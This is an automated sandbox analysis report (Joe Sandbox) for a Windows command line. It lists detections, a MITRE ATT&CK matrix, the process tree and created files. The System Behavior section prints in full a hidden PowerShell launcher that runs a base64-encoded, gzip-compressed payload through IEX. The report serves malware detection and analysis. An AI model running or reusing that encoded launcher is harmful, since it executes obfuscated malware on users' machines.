
ID: 278521
Cookbook: defaultwindowscmdlinecookbook.jbs
Time: 09:26:59
Date: 27/08/2020
Version: 29.0.0 Ocean Jasper

Table of Contents

Table of Contents  2
Analysis Report  4
  Overview  4
    General Information  4
    Detection  4
    Signatures  4
    Classification  4
  Startup  4
  Malware Configuration  6
  Yara Overview  6
  Sigma Overview  6
    System Summary:  6
  Signature Overview  6
    E-Banking Fraud:  6
    System Summary:  6
    Data Obfuscation:  7
    HIPS / PFW / Protection Evasion:  7
  Mitre Att&ck Matrix  7
  Behavior Graph  7
  Screenshots  8
    Thumbnails  8
  Antivirus, Machine Learning and Genetic Malware Detection  9
    Initial Sample  9
    Dropped Files  9
    Unpacked PE Files  9
    Domains  9
    URLs  9
  Domains and IPs  9
    Contacted Domains  10
    Contacted IPs  10
  General Information  10
  Simulations  10
    Behavior and APIs  10
  Joe Sandbox View / Context  10
    IPs  10
    Domains  10
    ASN  11
    JA3 Fingerprints  11
    Dropped Files  11
  Created / dropped Files  11
  Static File Info  11
    No static file info  11
  Network Behavior  11
  Code Manipulations  12
  Statistics  12
  Behavior  12
  System Behavior  12
    Analysis Process: cmd.exe PID: 6648 Parent PID: 4912  12
      General  12
      File Activities  13
    Analysis Process: conhost.exe PID: 6660 Parent PID: 6648  13
      General  14
    Analysis Process: cmd.exe PID: 6712 Parent PID: 6648  14
      General  14
      File Activities  15
    Analysis Process: powershell.exe PID: 6724 Parent PID: 6712  15
      General  15
      File Activities  16
        File Created  17
        File Written  17
        File Read  17
  Disassembly  18

Copyright null 2020

Analysis Report

Overview

General Information

Analysis ID: 278521
Most interesting Screenshot: (screenshot not included in this text)

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious encrypted Powershell command line found
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Lines
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Encrypted powershell cmdline option found
Contains capabilities to detect virtua…
Contains long sleeps (>= 3 min)
Creates a process in suspended mo…
Enables debug privileges
May sleep (evasive loops) to hinder …
Queries the volume information (nam…
Very long cmdline option found, this…

Classification

Categories shown on the classification chart: Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware. Verdict scale: malicious, suspicious, clean.

Startup

System is w10x64

cmd.exe (PID: 6648, cmdline: cmd /C 'C:\Windows\system32\cmd.exe /b /c start /b /min powershell -nop -w hidden -encodedcommand [base64 encoded command omitted]', MD5: F3BDBE3BB6F734E357235F4D5898582D)
  conhost.exe (PID: 6660, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  cmd.exe (PID: 6712, cmdline: C:\Windows\system32\cmd.exe /b /c start /b /min powershell -nop -w hidden -encodedcommand [base64 encoded command omitted], MD5: F3BDBE3BB6F734E357235F4D5898582D)
    powershell.exe (PID: 6724, cmdline: powershell -nop -w hidden -encodedcommand [base64 encoded command omitted], MD5: DBA3E6449E97D4E3DF64527EF7012A10)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Lines

Sigma detected: Suspicious Encoded PowerShell Command Line

Signature Overview

• Spreading
• E-Banking Fraud
• System Summary
• Data Obfuscation
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection


E-Banking Fraud:

Malicious encrypted Powershell command line found

System Summary:

Very long command line found

Data Obfuscation:

Suspicious powershell command line found

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Mitre Att&ck Matrix

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Command and Scripting Interpreter 1 1; PowerShell 3; At (Windows); Cron
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Privilege Escalation: Process Injection 1 1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Defense Evasion: Masquerading 1; Virtualization/Sandbox Evasion 3; Process Injection 1 1; Deobfuscate/Decode Files or Information 1; Software Packing
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Security Software Discovery 1; Virtualization/Sandbox Evasion 3; Process Discovery 1; File and Directory Discovery 2; System Information Discovery 1 1
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits
Command and Control: Data Obfuscation; Junk Data; Steganography; Protocol Impersonation; Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication

Behavior Graph

(Behavior graph rendered as an image in the original.) Legend: ID: 278521, Cookbook: defaultwindowscmdlinecookbook.jbs, Startdate: 27/08/2020, Architecture: WINDOWS, Score: 68; node types: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Is malicious, Internet; language markers: Delphi, Java, C# or VB.NET, C, C++ or other language.

Process chain shown in the graph:

cmd.exe (Malicious encrypted Powershell command line found; Suspicious powershell command line found; Very long command line found; 3 other signatures)
  started cmd.exe (Malicious encrypted Powershell command line found; Very long command line found) and conhost.exe
    cmd.exe started powershell.exe (Malicious encrypted Powershell command line found; Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found)

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 29.0.0 Ocean Jasper
Analysis ID: 278521
Start date: 27.08.2020
Start time: 09:26:59
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 1m 48s
Hypervisor based Inspection enabled: false
Report: light
Cookbook file name: defaultwindowscmdlinecookbook.jbs
Analysis system description: w10x64 64 bit v1803 with Office Professional Plus 2016, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: EGA enabled, HDC enabled, AMSI enabled
Analysis Mode: default
Analysis stop reason:
Detection: MAL
Classification: mal68.bank.evad.win@6/2@0/0
Cookbook Comments: Adjust boot time; Enable AMSI; Stop behavior analysis, all processes terminated

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\\Windows\PowerShell\StartupProfileData-Interactive
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Size (bytes): 788
Entropy (8bit): 5.086430865224559
Encrypted: false
MD5: 11DD62925A1DDFD437C0617DCF810BF7
SHA1: E22E5D3D7C4CC2F435432D97BAC2F69099EDAFDD
SHA-256: 420B772FBD48AE14EFE410FB7C7A10E4BB0B2AA04D93625FFC6704AEA5422F04
SHA-512: 784CDDEA6E651B25AF83E499AD03248FF251F7CCD7FAA2F0C9DB6F7A62D7071C2A6A640E2544FDE64A5C06D48B062B9CDD9D5ABEC1229ECE36BF27F898EC06D3
Malicious: false
Reputation: low
Preview: (binary preview not reproduced)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7QMKPL9LWVYZ4Y4HXHFV.temp
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Size (bytes): 6205
Entropy (8bit): 3.7602921069456774
Encrypted: false
MD5: 06AFE9AC5C20E23112373B406D837F7B
SHA1: F74C029750CE64489C651EED0C4BB2C550F5C6A3
SHA-256: 60DEF60525625E93E69D0133F0B1141A36FEFEB3B47033096CA377F3112EF5A9
SHA-512: C92380AFF3CD0018B31B414C8999502688115807293B57878B1BAA6732D056D119B81F792DBEA892BDA660A19C8D53FF7C9ACC93EE6BC3B8090B9C702DA71F0A
Malicious: false
Reputation: low
Preview: (binary preview not reproduced)

Static File Info

No static file info

Network Behavior

No network behavior found

Code Manipulations

Statistics

Behavior

• cmd.exe
• conhost.exe
• cmd.exe
• powershell.exe


System Behavior

Analysis Process: cmd.exe PID: 6648 Parent PID: 4912

General

Start time: 09:27:43
Start date: 27/08/2020
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /C 'C:\Windows\system32\cmd.exe /b /c start /b /min powershell -nop -w hidden -encodedcommand [base64 encoded command omitted]'
Imagebase: 0x810000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

File Activities

Source File Path Access Attributes Options Completion Count Address Symbol

Analysis Process: conhost.exe PID: 6660 Parent PID: 6648

General

Start time: 09:27:44
Start date: 27/08/2020
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7bc490000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

Analysis Process: cmd.exe PID: 6712 Parent PID: 6648

General

Start time: 09:27:45
Start date: 27/08/2020
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBiAFgAUABhAE8AQgBEACsASABIADYARgBQAG0AVABHADkAaABRAG8AQwBiAGsAMAA5AEMAWQB6ADUAZAAzAG0AZwBOAEMAWQBKAEwAUwBVAFkAWQBRAHMAZwA0AG0AeABRAEoASQBOADUAdAByAC8AZgBpAHMAYgBVADMAcABOADcAagBwAHoAbAB4AGsAbQBzAHIAUwA3ADIAbgAzADIAMgBWADMAWgBWAEIAWgBzAHkAVAAwAGkAZQA4AHkAaABxAFAAQgBJAHUAZgBCAFkAZwBDADUAegB1AGYATQBHAHMAeQBTADYAUgBSACsAMABuAEIAcwBHAFIASwBwAHQAdABaAGoATwBxAFoAeQB1AE8AUwBOAFQANwBEAGkAYwBDAG8ASAArAHoASgAwAE4ATQBNAGMAcgBwAEoAOQBIAG0ARQA5AFgAegBBAGwAOQBtAGsAZgBKAGgAeABLAGsAVABzAGkAcABjAFgAYQBXAE8AMAB1ADIAdwBrAEIAZwBsADAANABEAEwATAAyAEkAVABsAGQAVQBMAHAAZwBqADQAQwBKADkAWABGADIAdgBHADIAeQBGAHYAVwBEAHkALwBuADAAOQA1AEoAdwBHAE0AdgAwAHUAdABxAG0AcwBDAGsARgBYAE0AOQArAGoAUQBqAGYAUQBWAC8AUwAwAG8ASgB3AFcANwBtAFoATABTAGkAVAA2AEUANQAxAFAAaQAyADIAZgB6AGIAQgAvAEUASQB2AHIAbQBDAHcAZwBvAEcAcgBnAHEATABNAHUASQAxAGgARgBVAEwAVABYAHYAaQBkADEANwBjAHMAWAB6AFIAZwBYAEwAaQBiAEYANQBpAGIARQB2AHQAQQAxAE8AeABhAFMAcgBvAHEATwA3ADIAcwBHACsAbQBhAG8AQwA0AGYAeABtAHUAcABhAHoAeQBPAGMAQwBlAGIASwA0AHAATQBYAGwAQwArAEwARAA0AG4AMwAvAGMAVAA1AFgAdQBxADcAWgBoAHcAaQBtADYAOAB4AHgAUABGADYAawBNAHAAcQBxAHEATgByAHMAQgB3AEEATgB0AFUAVQBRAHkAMgBQAHgAdQBxACsAOABXAFMAQwBQAGgAeQA5AHUAUQA4AEQANgBhADEAbwAwAFEAbwBrADUAVwB4AHQAVQB4ADUANQBoAEkAcQBpAGkAUQBQAEgAcAAvAGYAVQBCAFQAVgBOAFEAUABxAEMAdQBXAGEAQQBFADUAegBLAGsAQQBjAG8AOAB3AFgAMABJAHYAWgBNADkAZgBNAGcAOQBQADAAOAAyAEIAMwAvAHEAdAAyAEoAMwBxAGYAYgBEAE4AeABmAFYAZABKAFAAbABVAEIAcQBJAEwAbQBSAFAAMwBEAGkAVgArAEQAbwBKAGIAeABKAHoAVQBFADQAUAAzAGwALwBRAGkANABEAC8AbgA0AGkAbQBKAEgANwBsAG4AdQBCAHEAZwA3ADEANgBSAHgATABPAHAAVwBBADcAdwBsAFgAYwAyAGQAbgA0ADIAUgBKAEkAUgA1ADkAdwBJAFMAWAA2AE4AMgBpAFUAaAA3ADEAdwBBAGsAcwBHAFkAOQBWAE8AbwBjADgAcABNAGIAawBlADMANwBTAGEAegBOAE4AawBYAC8AVgAwAEUAVwBtAGQAZABCAEoAMAA1AFAANgBjAFkAdgBHAGoAOAB4AHoASgByAGsAegBJADMAZABnAGoAOQBxAGYAegBrAEwAUABkAHkAaABYADUANgA5AFgAUQA0AE8ANgBYAGsAQQBiAGMAWQBCAFgASABzAGsASQByADcAKwBVAE0AKwByADYATgBNAEcAagBtAEkAbgAxAHcAVQA5AGQATwB4AHgAUQBwADMARgBBAFIAMQBPAEEAagBuADkAVwBhADYANAA4AGUAZABTAHQAcABjADUAVgBDAGUAUgBkAGcARgBkAEEAQwBlAE4ASABaADkASQBjADYAcABvAFYAOQBPAGcASwA4AEUAdQAvAGcAYQBiAG4ATABwAFEAWgB6AGEAUQBQAHAAUgBWAG4AdAA2AHQAdgB4AGUAVwA2AGoANABYAEkAbwAwAEUASQBkAFUANwB5AHkASwBiAFkAcAAwADQAZQBWAFEAUABoAEgAWQA2AHEAbwBXAFQASgBVAHYAdgB1AGIAaQAvADAAcABVAGUAdwBrAEoAbQA1AGkAZgBFAEMAcABJAGUAcgA2AHkAeQBBAGkAZwBrAEoAWgBCAGQAZwBHAE4AcAByAFMAagB6AHMASwAxAFQAeQB5AFAAUQBjAFcAbwB0AHQAYgA1ADYANQBvAEwAMgBJAFMAUgAzADcAUABwAFEAYwBXAEkAbwBnAEoANwBDAGoAcwBMAEMAbAA0AGcAeAAzADgAbgAvAG4AaAAxAEcAMABxAGIAUgBXAGEANQArAHUAUQBEAHIAcABRAGkAMABmAHoANgBIAG4ASABDAG8AcQBvAFIAdQBlAFUAMABmADcAQgA3AGUAegBPAGsAbQBMAFEAbQBHAFYAZwBYAFQAaQBOAEIARABBADkAcABuAE0AbwAwAGUAUABTACsAaAByAFcAdgA0AG4ANAB2ADAAMwA5ADMANQBzAE0AVAArADQAVwBlAGYAMABrAEUAZwA5AEsAYwBSAHgATABaAGEAcQBYAEIASgBKAG8AbwBiAEwANwBSAEgATABCAEQAawB1AEEAYgBVAFcAWgA2AHMAYQBGAHYAVAA2AHkAawA3AGEAbQBLADYAVgBiADgASwBOAEYAZgBlAFcASAA2ADkANQB1AHgAbQAxAHoASQAzAFoASABNAEkAdgBnAGwAOQA1ADAAMgBwADIAdQA1ADMANwBkAGUAMgArAFMANQByAGgAMwBjAEEAcwBkAFYAegByADQAMAAzAGoASwB0AHkARwBWAGoAaQBzAGwAYwBxAHQARQBzAGoAdABOACsAMgBtAGEAMABWADMANwBOAE4ARgB1AEwAcQA2AGMATgBaAFcAMQBJAGMAOQA4AFcANQBqAGkAbwBZAFYATgBhAHIAbQA1AFkAYQAxAHIAdQBkAGUANQBXAEEAbgAxAGYAOAA0ADIAMQA3AE0AUgBsAGIAcgAzAGEAegBkAHUAagBJAGYAUgBVAHYASgBtADEAWgBVAGEAMgAzAHEARgBRAGIAcgB0ADEAWgBVAFoAeAAzAFEAdQA3AGwAZQBCADcAVwB0AGMAMABXAGIAbgBXAHMANgA2AHAASgB0AFcAZAA1AFEAUABOAC8ARgBmAHoAeQArAGEAWQBiADkAegBxAGUAUwBXAFAAWQBnAEIAcgB1AHkASgA1ADEANgB2ADIATwBWADUATAB0AEYAdQBkAEUAdQBEAHoANwB2AFkAeQBhAFcAVgB0AHoALwByAFIAbQB1AFkALwBJAHMAbABzADgAeABXAGQAcgB4ADMAYgBBAFQAZwA5AHoAegBzADIALwBiAHQAWgAxADkAKwBYAG4ANABkAHUAQwBTAFMAbgBEAEgAKwBsAHUAbgBZADUAVgBiADMAWABwAHAAUgA3AGYATwAvAG4ASQBkADkAawBmAEQAaAArAGUAbABiAFkAUAA4AE4AVwArAHgAdQA0AGQAZwBJADkAcgB6AEsAegB0AGsAbwB5ADIASgBZAFAALwBDAHQAcAAyAGQAQQA0AEARgBvAC8AaABUAGUAWQBDAFoAcwB5AFgANwBaAEQALwB1AE4AZQBEAHUAMAB6AFAAQQBoADUAUQAzADcAUgBzAFQANABnAHAAcQBjAFoAZAB2AFAAQQBLAFkARQA3AE0AWABkAHgAZgB4AHcARQA1AHMATwBzADEAbwBlAGUAbQArAGMAOABIAC8AawB2ADMAbQA2AFcASgB0AG0AcQBTAHkAQQBmAG4AcgBSAFYAUwBMAEIAYgA3AHkAeQBiAE4AZAB1AFgAdQBhAGoAMABhAGsASQBuAGQAbQBiAFQALwBvAGsAdgA2AGUAbABNADMASwAyADgAYQBvAE0AcgBUADkAZgB0AHUAOQBxAEkAMAArACsAcwA3AFQAZwA3AG0AcgBOAFIAZQBPAGEAZQAyAGIASQArAGQAUgAzAEMAcABXAHUAWQB6AEQAbgBOAGkAcAAzAHYAcwA3AGcAdgA4AEYAWAA2AEkAagBiADQAQQB0AFEARQBTADEALwArAGEATgBvAGYAcgAzADgAVwBSADgAdgBwAHQAawA4AC8AYgA0AFgAWgBqAHQAdwBGAHIANQBOADgAWABCADUAQwBUAEMASgA4AHgANwBiAFkAagAxAE0AQgBjAEwANwBBAE0AagBZAFIAQgBsAGIAYQBUAEYAZQBPAHMAdwBUAGcAYgBNAFUAeABxADYALwB2AEkATAA2AEoAbgB5AGcAUAByAHcATwBvAEQAMwBRADEAWgA4AFYAZAA5AG4AUgBBADMAQQBWAHkAWQBSAGoATwBOADAAUwBFADYAZwB5AFQAegBBAHMAbgB6ADUANABzAHAAQQBSADAARwBZAGUAbQBsAE0AcwA5AEIAMQBrAHkARgB4AGkARABDAGIAbABaAG4AZwArAC8AZQBmAEkAYgB6ADgAQwBZAGgAZABHAHMAegBsAEkAbwA5AEsAdQAzAEsAcABWAEYATAAvAHIAMABwAEcANwB0AGQAaABxAGIATgAxAHIAQgAvAE4ANQBkAFcAUQBQAFAASABrADkAQwBZAC8AdQBjAGsANABvAE0ALwBEAFkARQBYAC8AeAB3AFQAOABjAE8AbQAvAFEANgB2AEEAUwArAGIAcwBFAGIAcgBFAG8AWgBmAHgATQBuAEwAYQBoADEAegBPAGMAdABIAEoAdgB2AEQAMgA4AEkAcQBrAEcAMwBTAFQAYwBFADkASQB6AEcAVgBoAHkAVwBiAHcANQBFAHgANgBxAEgANgBPAEQAVwBRADEAUgArAGcAYwBvADIAKwBvAEEATwBGAFYAUgBmAGsAUwAzAHAAMQA4AEgAcQBxAEcAaQB0AEoAbgA5AEYAZQAwAHgAVgA2AHEAKwBCAFgAZABVADAATABoAEcAVgBUAG8AcwBCAG0AdwBsAE0ASgBjAFYASwBZAFQASQAwAG8AWQA5AHYANABDAFAAYQAvAEEAaQBaAGMATABBAEEAQQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA
Imagebase: 0x810000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

File Activities

Source File Path Access Attributes Options Completion Count Address Symbol

Analysis Process: powershell.exe PID: 6724 Parent PID: 6712

General

Start time: 09:27:45
Start date: 27/08/2020
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBiAFgAUABhAE8AQgBEACsASABIADYARgBQAG0AVABHADkAaABRAG8AQwBiAGsAMAA5AEMAWQB6ADUAZAAzAG0AZwBOAEMAWQBKAEwAUwBVAFkAWQBRAHMAZwA0AG0AeABRAEoASQBOADUAdAByAC8AZgBpAHMAYgBVADMAcABOADcAagBwAHoAbAB4AGsAbQBzAHIAUwA3ADIAbgAzADIAMgBWADMAWgBWAEIAWgBzAHkAVAAwAGkAZQA4AHkAaABxAFAAQgBJAHUAZgBCAFkAZwBDADUAegB1AGYATQBHAHMAeQBTADYAUgBSACsAMABuAEIAcwBHAFIASwBwAHQAdABaAGoATwBxAFoAeQB1AE8AUwBOAFQANwBEAGkAYwBDAG8ASAArAHoASgAwAE4ATQBNAGMAcgBwAEoAOQBIAG0ARQA5AFgAegBBAGwAOQBtAGsAZgBKAGgAeABLAGsAVABzAGkAcABjAFgAYQBXAE8AMAB1ADIAdwBrAEIAZwBsADAANABEAEwATAAyAEkAVABsAGQAVQBMAHAAZwBqADQAQwBKADkAWABGADIAdgBHADIAeQBGAHYAVwBEAHkALwBuADAAOQA1AEoAdwBHAE0AdgAwAHUAdABxAG0AcwBDAGsARgBYAE0AOQArAGoAUQBqAGYAUQBWAC8AUwAwAG8ASgB3AFcANwBtAFoATABTAGkAVAA2AEUANQAxAFAAaQAyADIAZgB6AGIAQgAvAEUASQB2AHIAbQBDAHcAZwBvAEcAcgBnAHEATABNAHUASQAxAGgARgBVAEwAVABYAHYAaQBkADEANwBjAHMAWAB6AFIAZwBYAEwAaQBiAEYANQBpAGIARQB2AHQAQQAxAE8AeABhAFMAcgBvAHEATwA3ADIAcwBHACsAbQBhAG8AQwA0AGYAeABtAHUAcABhAHoAeQBPAGMAQwBlAGIASwA0AHAATQBYAGwAQwArAEwARAA0AG4AMwAvAGMAVAA1AFgAdQBxADcAWgBoAHcAaQBtADYAOAB4AHgAUABGADYAawBNAHAAcQBxAHEATgByAHMAQgB3AEEATgB0AFUAVQBRAHkAMgBQAHgAdQBxACsAOABXAFMAQwBQAGgAeQA5AHUAUQA4AEQANgBhADEAbwAwAFEAbwBrADUAVwB4AHQAVQB4ADUANQBoAEkAcQBpAGkAUQBQAEgAcAAvAGYAVQBCAFQAVgBOAFEAUABxAEMAdQBXAGEAQQBFADUAegBLAGsAQQBjAG8AOAB3AFgAMABJAHYAWgBNADkAZgBNAGcAOQBQADAAOAAyAEIAMwAvAHEAdAAyAEoAMwBxAGYAYgBEAE4AeABmAFYAZABKAFAAbABVAEIAcQBJAEwAbQBSAFAAMwBEAGkAVgArAEQAbwBKAGIAeABKAHoAVQBFADQAUAAzAGwALwBRAGkANABEAC8AbgA0AGkAbQBKAEgANwBsAG4AdQBCAHEAZwA3ADEANgBSAHgATABPAHAAVwBBADcAdwBsAFgAYwAyAGQAbgA0ADIAUgBKAEkAUgA1ADkAdwBJAFMAWAA2AE4AMgBpAFUAaAA3ADEAdwBBAGsAcwBHAFkAOQBWAE8AbwBjADgAcABNAGIAawBlADMANwBTAGEAegBOAE4AawBYAC8AVgAwAEUAVwBtAGQAZABCAEoAMAA1AFAANgBjAFkAdgBHAGoAOAB4AHoASgByAGsAegBJADMAZABnAGoAOQBxAGYAegBrAEwAUABkAHkAaABYADUANgA5AFgAUQA0AE8ANgBYAGsAQQBiAGMAWQBCAFgASABzAGsASQByADcAKwBVAE0AKwByADYATgBNAEcAagBtAEkAbgAxAHcAVQA5AGQATwB4AHgAUQBwADMARgBBAFIAMQBPAEEAagBuADkAVwBhADYANAA4AGUAZABTAHQAcABjADUAVgBDAGUAUgBkAGcARgBkAEEAQwBlAE4ASABaADkASQBjADYAcABvAFYAOQBPAGcASwA4AEUAdQAvAGcAYQBiAG4ATABwAFEAWgB6AGEAUQBQAHAAUgBWAG4AdAA2AHQAdgB4AGUAVwA2AGoANABYAEkAbwAwAEUASQBkAFUANwB5AHkASwBiAFkAcAAwADQAZQBWAFEAUABoAEgAWQA2AHEAbwBXAFQASgBVAHYAdgB1AGIAaQAvADAAcABVAGUAdwBrAEoAbQA1AGkAZgBFAEMAcABJAGUAcgA2AHkAeQBBAGkAZwBrAEoAWgBCAGQAZwBHAE4AcAByAFMAagB6AHMASwAxAFQAeQB5AFAAUQBjAFcAbwB0AHQAYgA1ADYANQBvAEwAMgBJAFMAUgAzADcAUABwAFEAYwBXAEkAbwBnAEoANwBDAGoAcwBMAEMAbAA0AGcAeAAzADgAbgAvAG4AaAAxAEcAMABxAGIAUgBXAGEANQArAHUAUQBEAHIAcABRAGkAMABmAHoANgBIAG4ASABDAG8AcQBvAFIAdQBlAFUAMABmADcAQgA3AGUAegBPAGsAbQBMAFEAbQBHAFYAZwBYAFQAaQBOAEIARABBADkAcABuAE0AbwAwAGUAUABTACsAaAByAFcAdgA0AG4ANAB2ADAAMwA5ADMANQBzAE0AVAArADQAVwBlAGYAMABrAEUAZwA5AEsAYwBSAHgATABaAGEAcQBYAEIASgBKAG8AbwBiAEwANwBSAEgATABCAEQAawB1AEEAYgBVAFcAWgA2AHMAYQBGAHYAVAA2AHkAawA3AGEAbQBLADYAVgBiADgASwBOAEYAZgBlAFcASAA2ADkANQB1AHgAbQAxAHoASQAzAFoASABNAEkAdgBnAGwAOQA1ADAAMgBwADIAdQA1ADMANwBkAGUAMgArAFMANQByAGgAMwBjAEEAcwBkAFYAegByADQAMAAzAGoASwB0AHkARwBWAGoAaQBzAGwAYwBxAHQARQBzAGoAdABOACsAMgBtAGEAMABWADMANwBOAE4ARgB1AEwAcQA2AGMATgBaAFcAMQBJAGMAOQA4AFcANQBqAGkAbwBZAFYATgBhAHIAbQA1AFkAYQAxAHIAdQBkAGUANQBXAEEAbgAxAGYAOAA0ADIAMQA3AE0AUgBsAGIAcgAzAGEAegBkAHUAagBJAGYAUgBVAHYASgBtADEAWgBVAGEAMgAzAHEARgBRAGIAcgB0ADEAWgBVAFoAeAAzAFEAdQA3AGwAZQBCADcAVwB0AGMAMABXAGIAbgBXAHMANgA2AHAASgB0AFcAZAA1AFEAUABOAC8ARgBmAHoAeQArAGEAWQBiADkAegBxAGUAUwBXAFAAWQBnAEIAcgB1AHkASgA1ADEANgB2ADIATwBWADUATAB0AEYAdQBkAEUAdQBEAHoANwB2AFkAeQBhAFcAVgB0AHoALwByAFIAbQB1AFkALwBJAHMAbABzADgAeABXAGQAcgB4ADMAYgBBAFQAZwA5AHoAegBzADIALwBiAHQAWgAxADkAKwBYAG4ANABkAHUAQwBTAFMAbgBEAEgAKwBsAHUAbgBZADUAVgBiADMAWABwAHAAUgA3AGYATwAvAG4ASQBkADkAawBmAEQAaAArAGUAbABiAFkAUAA4AE4AVwArAHgAdQA0AGQAZwBJADkAcgB6AEsAegB0AGsAbwB5ADIASgBZAFAALwBDAHQAcAAyAGQAQQA0AEARgBvAC8AaABUAGUAWQBDAFoAcwB5AFgANwBaAEQALwB1AE4AZQBEAHUAMAB6AFAAQQBoADUAUQAzADcAUgBzAFQANABnAHAAcQBjAFoAZAB2AFAAQQBLAFkARQA3AE0AWABkAHgAZgB4AHcARQA1AHMATwBzADEAbwBlAGUAbQArAGMAOABIAC8AawB2ADMAbQA2AFcASgB0AG0AcQBTAHkAQQBmAG4AcgBSAFYAUwBMAEIAYgA3AHkAeQBiAE4AZAB1AFgAdQBhAGoAMABhAGsASQBuAGQAbQBiAFQALwBvAGsAdgA2AGUAbABNADMASwAyADgAYQBvAE0AcgBUADkAZgB0AHUAOQBxAEkAMAArACsAcwA3AFQAZwA3AG0AcgBOAFIAZQBPAGEAZQAyAGIASQArAGQAUgAzAEMAcABXAHUAWQB6AEQAbgBOAGkAcAAzAHYAcwA3AGcAdgA4AEYAWAA2AEkAagBiADQAQQB0AFEARQBTADEALwArAGEATgBvAGYAcgAzADgAVwBSADgAdgBwAHQAawA4AC8AYgA0AFgAWgBqAHQAdwBGAHIANQBOADgAWABCADUAQwBUAEMASgA4AHgANwBiAFkAagAxAE0AQgBjAEwANwBBAE0AagBZAFIAQgBsAGIAYQBUAEYAZQBPAHMAdwBUAGcAYgBNAFUAeABxADYALwB2AEkATAA2AEoAbgB5AGcAUAByAHcATwBvAEQAMwBRADEAWgA4AFYAZAA5AG4AUgBBADMAQQBWAHkAW